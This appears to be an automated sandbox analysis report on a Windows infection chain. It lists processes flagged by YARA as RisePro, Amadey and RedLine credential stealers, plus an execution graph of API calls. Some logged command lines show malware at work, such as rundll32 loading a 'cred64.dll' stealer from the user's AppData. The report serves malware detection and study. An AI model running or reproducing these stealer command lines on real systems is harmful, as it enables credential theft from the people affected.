                                                                                                                                                                                                                                      File size:2'295'808 bytes
                                                                                                                                                                                                                                      MD5 hash:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 51%, Virustotal, Browse
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:47
                                                                                                                                                                                                                                      Start time:03:29:52
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                                                                                                                                                                                                                                      Imagebase:0xca0000
                                                                                                                                                                                                                                      File size:1'166'336 bytes
                                                                                                                                                                                                                                      MD5 hash:FB666C3917F960FD67DF0C2C8829D77F
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:48
                                                                                                                                                                                                                                      Start time:03:29:53
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:49
                                                                                                                                                                                                                                      Start time:03:29:53
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1984,i,457568203381776828,11237095852378400144,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:50
                                                                                                                                                                                                                                      Start time:03:30:00
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Imagebase:0x70000
                                                                                                                                                                                                                                      File size:1'905'152 bytes
                                                                                                                                                                                                                                      MD5 hash:339020815B65530333BF2DDC928AC867
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000032.00000003.3292101674.0000000004840000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:51
                                                                                                                                                                                                                                      Start time:03:30:00
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                                                                                                                                                                                                                                      Imagebase:0xaa0000
                                                                                                                                                                                                                                      File size:2'295'808 bytes
                                                                                                                                                                                                                                      MD5 hash:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000033.00000002.3372562116.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000033.00000003.3293720784.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:52
                                                                                                                                                                                                                                      Start time:03:30:05
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
                                                                                                                                                                                                                                      Imagebase:0x3c0000
                                                                                                                                                                                                                                      File size:97'792 bytes
                                                                                                                                                                                                                                      MD5 hash:4CFD179519524269052023E10DE6B866
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: ditekSHen
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: ditekSHen
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 77%, Virustotal, Browse
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:53
                                                                                                                                                                                                                                      Start time:03:30:05
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:54
                                                                                                                                                                                                                                      Start time:03:30:06
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                                                                                                                                                                                                      Imagebase:0xb90000
                                                                                                                                                                                                                                      File size:61'440 bytes
                                                                                                                                                                                                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:55
                                                                                                                                                                                                                                      Start time:03:30:06
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:
                                                                                                                                                                                                                                      Imagebase:0x7ff6e2750000
                                                                                                                                                                                                                                      File size:71'680 bytes
                                                                                                                                                                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:56
                                                                                                                                                                                                                                      Start time:03:30:06
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:
                                                                                                                                                                                                                                      Imagebase:0xfd0000
                                                                                                                                                                                                                                      File size:97'792 bytes
                                                                                                                                                                                                                                      MD5 hash:4CFD179519524269052023E10DE6B866
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 77%, Virustotal, Browse
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:57
                                                                                                                                                                                                                                      Start time:03:30:06
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:58
                                                                                                                                                                                                                                      Start time:03:30:07
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                                                                                                      Commandline:
                                                                                                                                                                                                                                      Imagebase:
                                                                                                                                                                                                                                      File size:96'768 bytes
                                                                                                                                                                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:4.1%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:5.1%
                                                                                                                                                                                                                                        Total number of Nodes:568
                                                                                                                                                                                                                                        Total number of Limit Nodes:22
                                                                                                                                                                                                                                        execution_graph 9635 b895b9 9636 b8a3e7 9635->9636 9638 b895ce shared_ptr 9635->9638 9637 b8a423 Sleep CreateMutexA 9636->9637 9639 b8a45e 9637->9639 9638->9636 9640 b8961b shared_ptr 9638->9640 9641 b89629 9640->9641 9642 b85d40 3 API calls 9640->9642 9643 b8964c 9642->9643 9650 b88600 9643->9650 9645 b8965d 9646 b85d40 3 API calls 9645->9646 9647 b89781 9646->9647 9648 b88600 3 API calls 9647->9648 9649 b89792 9648->9649 9651 b8864c 9650->9651 9652 b85d40 3 API calls 9651->9652 9653 b88667 shared_ptr std::future_error::future_error 9652->9653 9653->9645 9156 bb7cb9 9159 bb7b57 9156->9159 9160 bb7b65 9159->9160 9161 bb7bb0 9160->9161 9164 bb7bbb 9160->9164 9163 bb7bba 9170 bbb922 GetPEB 9164->9170 9166 bb7bc5 9167 bb7bda 9166->9167 9168 bb7bca GetPEB 9166->9168 9169 bb7bf2 ExitProcess 9167->9169 9168->9167 9171 bbb93c 9170->9171 9171->9166 9654 b841b0 9657 b839c0 9654->9657 9656 b841bb shared_ptr 9658 b839f9 9657->9658 9661 b83b38 9658->9661 9662 b83a39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 9658->9662 9664 b831d0 9658->9664 9660 b831d0 6 API calls 9663 b83b5f 9660->9663 9661->9660 9661->9663 9662->9656 9663->9656 9665 b9dd3c GetSystemTimePreciseAsFileTime 9664->9665 9671 b83214 9665->9671 9666 b8326b 9667 b9d8fa 5 API calls 9666->9667 9669 b8323c __Mtx_unlock 9667->9669 9670 b9d8fa 5 API calls 9669->9670 9673 b83250 std::future_error::future_error 9669->9673 9672 b83277 9670->9672 9671->9666 9671->9669 9683 b9d3dc 9671->9683 9674 b9dd3c GetSystemTimePreciseAsFileTime 9672->9674 9673->9661 9675 b832af 9674->9675 9676 b9d8fa 5 API calls 9675->9676 9677 b832b6 __Cnd_broadcast 9675->9677 9676->9677 9678 b9d8fa 5 API calls 9677->9678 9679 b832d7 __Mtx_unlock 9677->9679 9678->9679 9680 b9d8fa 5 API calls 9679->9680 9681 b832eb 9679->9681 9682 b8330e 9680->9682 9681->9661 9682->9661 9686 b9d202 9683->9686 9685 b9d3ec 9685->9671 9687 b9d22c 9686->9687 9688 b9e5fb _xtime_get GetSystemTimePreciseAsFileTime 9687->9688 9689 b9d234 __Xtime_diff_to_millis2 std::future_error::future_error 9687->9689 9690 b9d25f __Xtime_diff_to_millis2 9688->9690 9689->9685 9690->9689 9691 b9e5fb _xtime_get GetSystemTimePreciseAsFileTime 9690->9691 9691->9689 9256 b818a0 9257 b818b1 9256->9257 9260 b9ece3 9257->9260 9263 b9ecb6 9260->9263 9264 b9eccc 9263->9264 9265 b9ecc5 9263->9265 9272 bbaf1b 9264->9272 9269 bbaeaf 9265->9269 9268 b818bb 9270 bbaf1b RtlAllocateHeap 9269->9270 9271 bbaec1 9270->9271 9271->9268 9275 bbac51 9272->9275 9274 bbaf4c 9274->9268 9276 bbac5d __dosmaperr 9275->9276 9279 bbacac 9276->9279 9278 bbac78 9278->9274 9280 bbacc8 9279->9280 9281 bbad35 __freea 9279->9281 9280->9281 9284 bbad15 __freea 9280->9284 9285 bc0416 9280->9285 9281->9278 9283 bc0416 RtlAllocateHeap 9283->9281 9284->9281 9284->9283 9288 bc0423 9285->9288 9286 bc042f __dosmaperr ___std_exception_copy 9286->9284 9288->9286 9289 bc662f 9288->9289 9290 bc663c 9289->9290 9292 bc6644 __dosmaperr __freea 9289->9292 9291 bbc66b RtlAllocateHeap 9290->9291 9291->9292 9292->9286 10177 b81fa0 10178 b9dd1b __Mtx_init_in_situ 2 API calls 10177->10178 10179 b81fac 10178->10179 10180 b9ece3 RtlAllocateHeap 10179->10180 10181 b81fb6 10180->10181 9305 b8a4a4 9316 b88d00 9305->9316 9307 b8a4b3 shared_ptr 9308 b85d40 3 API calls 9307->9308 9315 b8a563 shared_ptr 9307->9315 9309 b8a515 9308->9309 9310 b85d40 3 API calls 9309->9310 9311 b8a53d 9310->9311 9312 b85d40 3 API calls 9311->9312 9312->9315 9313 b8a7ec shared_ptr std::future_error::future_error 9315->9313 9326 bba0d9 9315->9326 9319 b88d54 shared_ptr 9316->9319 9317 b85d40 3 API calls 9317->9319 9318 b89013 shared_ptr std::future_error::future_error 9318->9307 9319->9317 9324 b88f1f shared_ptr 9319->9324 9320 b85d40 3 API calls 9320->9324 9321 b89385 shared_ptr std::future_error::future_error 9321->9307 9322 b8926f shared_ptr 9322->9321 9323 b85d40 3 API calls 9322->9323 9325 b893f7 shared_ptr ___std_exception_copy std::future_error::future_error 9323->9325 9324->9318 9324->9320 9324->9322 9325->9307 9327 bba0f4 9326->9327 9328 bb9e37 RtlAllocateHeap 9327->9328 9329 bba0fe 9328->9329 9329->9315 10194 b9e7a6 10195 b9e7b7 10194->10195 10196 b9e7bf 10195->10196 10198 b9e82e 10195->10198 10199 b9e83c SleepConditionVariableCS 10198->10199 10201 b9e855 10198->10201 10199->10201 10201->10195 9912 b83e9f 9913 b83ead 9912->9913 9915 b83eb6 9912->9915 9914 b82310 5 API calls 9913->9914 9914->9915 9916 b82a90 9917 b82ace 9916->9917 9918 b9ce8b TpReleaseWork 9917->9918 9919 b82adb shared_ptr std::future_error::future_error 9918->9919 9708 b8958d 9710 b8959c 9708->9710 9711 b895d8 9710->9711 9712 b8a3e7 9711->9712 9713 b8961b shared_ptr 9711->9713 9714 b8a423 Sleep CreateMutexA 9712->9714 9715 b89629 9713->9715 9716 b85d40 3 API calls 9713->9716 9718 b8a45e 9714->9718 9717 b8964c 9716->9717 9719 b88600 3 API calls 9717->9719 9720 b8965d 9719->9720 9721 b85d40 3 API calls 9720->9721 9722 b89781 9721->9722 9723 b88600 3 API calls 9722->9723 9724 b89792 9723->9724 10205 b83b8e 10206 b83b98 10205->10206 10207 b82310 5 API calls 10206->10207 10208 b83ba5 10206->10208 10207->10208 9920 b88280 9921 b88288 GetFileAttributesA 9920->9921 9922 b88286 9920->9922 9923 b88294 9921->9923 9922->9921 9176 b88282 9177 b88288 GetFileAttributesA 9176->9177 9178 b88286 9176->9178 9179 b88294 9177->9179 9178->9177 9961 b83ee0 9962 b83f22 9961->9962 9963 b83f8c 9962->9963 9964 b83fd2 9962->9964 9967 b83f35 std::future_error::future_error 9962->9967 9968 b834e0 9963->9968 9965 b83de0 3 API calls 9964->9965 9965->9967 9969 b83516 9968->9969 9973 b8354e Concurrency::cancel_current_task shared_ptr std::future_error::future_error 9969->9973 9974 b82be0 9969->9974 9971 b8359e 9972 b82b00 3 API calls 9971->9972 9971->9973 9972->9973 9973->9967 9975 b82c1d 9974->9975 9976 b9d56f InitOnceExecuteOnce 9975->9976 9977 b82c46 9976->9977 9978 b82c51 std::future_error::future_error 9977->9978 9980 b9d587 9977->9980 9978->9971 9981 b9d593 Concurrency::cancel_current_task 9980->9981 9982 b9d5fa 9981->9982 9983 b9d603 9981->9983 9987 b9d50f 9982->9987 9984 b829e0 2 API calls 9983->9984 9986 b9d5ff 9984->9986 9986->9978 9988 b9e2c1 InitOnceExecuteOnce 9987->9988 9989 b9d527 9988->9989 9990 b9d52e 9989->9990 9991 bb834b RtlAllocateHeap 9989->9991 9990->9986 9992 b9d537 9991->9992 9992->9986 9172 b8a9d0 9173 b8aa22 9172->9173 9174 b8abdd CoInitialize 9173->9174 9175 b8ac2a shared_ptr std::future_error::future_error 9174->9175 9365 b8d8d0 recv 9366 b8d932 recv 9365->9366 9367 b8d967 recv 9366->9367 9368 b8d9a1 9367->9368 9369 b8dac3 std::future_error::future_error 9368->9369 9374 b9dd3c 9368->9374 9384 b9dae2 9374->9384 9376 b8dafe 9377 b9d8fa 9376->9377 9378 b9d904 9377->9378 9383 b9d922 ___std_exception_copy 9377->9383 9379 b9d913 9378->9379 9378->9383 9401 b9d927 9379->9401 9404 bb7c7d 9383->9404 9385 b9db38 9384->9385 9387 b9db0a std::future_error::future_error 9384->9387 9385->9387 9390 b9e5fb 9385->9390 9387->9376 9388 b9db8d __Xtime_diff_to_millis2 9388->9387 9389 b9e5fb _xtime_get GetSystemTimePreciseAsFileTime 9388->9389 9389->9388 9391 b9e60a 9390->9391 9393 b9e617 __aulldvrm 9390->9393 9391->9393 9394 b9e5d4 9391->9394 9393->9388 9397 b9e27a 9394->9397 9398 b9e28b GetSystemTimePreciseAsFileTime 9397->9398 9399 b9e297 9397->9399 9398->9399 9399->9393 9407 b829e0 9401->9407 9403 b9d93e Concurrency::cancel_current_task 9405 bb7b57 3 API calls 9404->9405 9406 bb7c8e 9405->9406 9413 b9d56f 9407->9413 9409 b829ff 9409->9403 9410 b829f4 __dosmaperr 9410->9409 9416 bb7f7d 9410->9416 9412 bb83ca __freea 9412->9403 9419 b9e2c1 9413->9419 9423 bb7ecb 9416->9423 9418 bb7f95 9418->9412 9420 b9e2cf InitOnceExecuteOnce 9419->9420 9421 b9d582 9419->9421 9420->9421 9421->9410 9424 bb7ef3 9423->9424 9429 bb7ed9 __dosmaperr __fassign 9423->9429 9425 bb7efa 9424->9425 9427 bb7f19 __fassign 9424->9427 9425->9429 9430 bb8076 9425->9430 9428 bb8076 RtlAllocateHeap 9427->9428 9427->9429 9428->9429 9429->9418 9431 bb8084 9430->9431 9434 bb80b5 9431->9434 9435 bbc66b RtlAllocateHeap 9434->9435 9436 bb8095 9435->9436 9436->9429 9437 bb80d4 9438 bb80ec 9437->9438 9439 bb80e2 9437->9439 9440 bb7f7d RtlAllocateHeap 9438->9440 9441 bb8113 __freea 9440->9441 9131 b85dc8 9133 b85dd6 shared_ptr ___std_exception_copy 9131->9133 9132 b85e5c shared_ptr std::future_error::future_error 9133->9132 9134 b85ee4 RegOpenKeyExA 9133->9134 9135 b85f41 RegCloseKey 9134->9135 9136 b85f17 RegQueryValueExA 9134->9136 9138 b85f67 shared_ptr 9135->9138 9136->9135 9137 b85fe7 shared_ptr std::future_error::future_error 9138->9137 9145 b85d40 9138->9145 9140 b86231 shared_ptr 9141 b85d40 3 API calls 9140->9141 9144 b863d2 shared_ptr std::future_error::future_error 9140->9144 9143 b862bd shared_ptr 9141->9143 9142 b85d40 3 API calls 9142->9143 9143->9142 9143->9144 9147 b85d84 shared_ptr ___std_exception_copy 9145->9147 9146 b85e5c shared_ptr std::future_error::future_error 9146->9140 9147->9146 9148 b85ee4 RegOpenKeyExA 9147->9148 9149 b85f41 RegCloseKey 9148->9149 9150 b85f17 RegQueryValueExA 9148->9150 9151 b85f67 shared_ptr std::future_error::future_error 9149->9151 9150->9149 9151->9140 10254 b87330 10255 b87371 shared_ptr 10254->10255 10256 b85d40 3 API calls 10255->10256 10258 b87403 shared_ptr 10255->10258 10256->10258 10257 b85d40 3 API calls 10260 b87563 10257->10260 10258->10257 10259 b874d3 shared_ptr std::future_error::future_error 10258->10259 10261 b85d40 3 API calls 10260->10261 10262 b87595 shared_ptr 10261->10262 10263 b85d40 3 API calls 10262->10263 10268 b87625 shared_ptr std::future_error::future_error 10262->10268 10264 b876fd 10263->10264 10265 b85d40 3 API calls 10264->10265 10266 b87720 10265->10266 10267 b85d40 3 API calls 10266->10267 10267->10268 9458 b82034 9463 b9dd1b 9458->9463 9461 b9ece3 RtlAllocateHeap 9462 b8204a 9461->9462 9466 b9da65 9463->9466 9465 b82040 9465->9461 9467 b9da71 9466->9467 9468 b9da7b 9466->9468 9469 b9da2e 9467->9469 9470 b9da4e 9467->9470 9468->9465 9469->9468 9475 b9e365 9469->9475 9479 b9e39a 9470->9479 9473 b9da60 9473->9465 9476 b9da47 9475->9476 9477 b9e373 InitializeCriticalSectionEx 9475->9477 9476->9465 9477->9476 9480 b9e3af RtlInitializeConditionVariable 9479->9480 9480->9473 9485 b81020 9486 b81031 9485->9486 9487 b9ece3 RtlAllocateHeap 9486->9487 9488 b8103b 9487->9488 9497 b84020 9498 b8406a 9497->9498 9500 b840b2 std::future_error::future_error 9498->9500 9501 b83de0 9498->9501 9502 b83e48 9501->9502 9503 b83e1e 9501->9503 9504 b83e58 9502->9504 9507 b82b00 9502->9507 9503->9500 9504->9500 9508 b82b0e 9507->9508 9514 b9ced7 9508->9514 9510 b82b42 9511 b82b49 9510->9511 9520 b82b80 9510->9520 9511->9500 9513 b82b58 Concurrency::cancel_current_task 9515 b9cee4 9514->9515 9518 b9cf03 Concurrency::details::_Reschedule_chore 9514->9518 9523 b9e207 9515->9523 9517 b9cef4 9517->9518 9525 b9ceae 9517->9525 9518->9510 9531 b9ce8b 9520->9531 9522 b82bb2 shared_ptr 9522->9513 9524 b9e222 CreateThreadpoolWork 9523->9524 9524->9517 9526 b9ceb7 Concurrency::details::_Reschedule_chore 9525->9526 9529 b9e45c 9526->9529 9528 b9ced1 9528->9518 9530 b9e471 TpPostWork 9529->9530 9530->9528 9532 b9ce97 9531->9532 9534 b9cea7 9531->9534 9532->9534 9535 b9e108 9532->9535 9534->9522 9536 b9e11d TpReleaseWork 9535->9536 9536->9534 9180 b8a326 9181 b8a340 9180->9181 9182 b8a362 shared_ptr 9180->9182 9181->9182 9183 b8a41e 9181->9183 9186 b8a370 9182->9186 9196 b878b0 9182->9196 9187 b8a423 Sleep CreateMutexA 9183->9187 9185 b8a37e 9185->9186 9188 b878b0 5 API calls 9185->9188 9189 b8a45e 9187->9189 9190 b8a388 9188->9190 9190->9186 9191 b878b0 5 API calls 9190->9191 9192 b8a392 9191->9192 9192->9186 9193 b878b0 5 API calls 9192->9193 9194 b8a39c 9193->9194 9194->9186 9195 b878b0 5 API calls 9194->9195 9195->9186 9197 b87916 ___std_exception_copy 9196->9197 9198 b85d40 3 API calls 9197->9198 9232 b87a68 shared_ptr std::future_error::future_error 9197->9232 9199 b87952 9198->9199 9200 b85d40 3 API calls 9199->9200 9202 b8797f shared_ptr 9200->9202 9201 b87a53 GetNativeSystemInfo 9203 b87a57 9201->9203 9202->9201 9202->9203 9209 b87b2c ___std_exception_copy 9202->9209 9204 b87abf 9203->9204 9205 b87b94 9203->9205 9203->9232 9206 b85d40 3 API calls 9204->9206 9207 b85d40 3 API calls 9205->9207 9208 b87ae7 9206->9208 9210 b87bc7 9207->9210 9212 b85d40 3 API calls 9208->9212 9211 b85d40 3 API calls 9209->9211 9209->9232 9213 b85d40 3 API calls 9210->9213 9214 b87ef7 9211->9214 9215 b87b06 9212->9215 9217 b87be6 9213->9217 9216 b85d40 3 API calls 9214->9216 9233 bba1e1 9215->9233 9216->9232 9219 b85d40 3 API calls 9217->9219 9220 b87c19 9219->9220 9221 b85d40 3 API calls 9220->9221 9222 b87c6a 9221->9222 9223 b85d40 3 API calls 9222->9223 9224 b87c89 9223->9224 9225 b85d40 3 API calls 9224->9225 9226 b87cbc 9225->9226 9227 b85d40 3 API calls 9226->9227 9228 b87d0d 9227->9228 9229 b85d40 3 API calls 9228->9229 9230 b87d2c 9229->9230 9231 b85d40 3 API calls 9230->9231 9231->9232 9232->9185 9236 bb9e37 9233->9236 9235 bba1ff 9235->9209 9237 bb9e49 9236->9237 9239 bb9e5e __dosmaperr 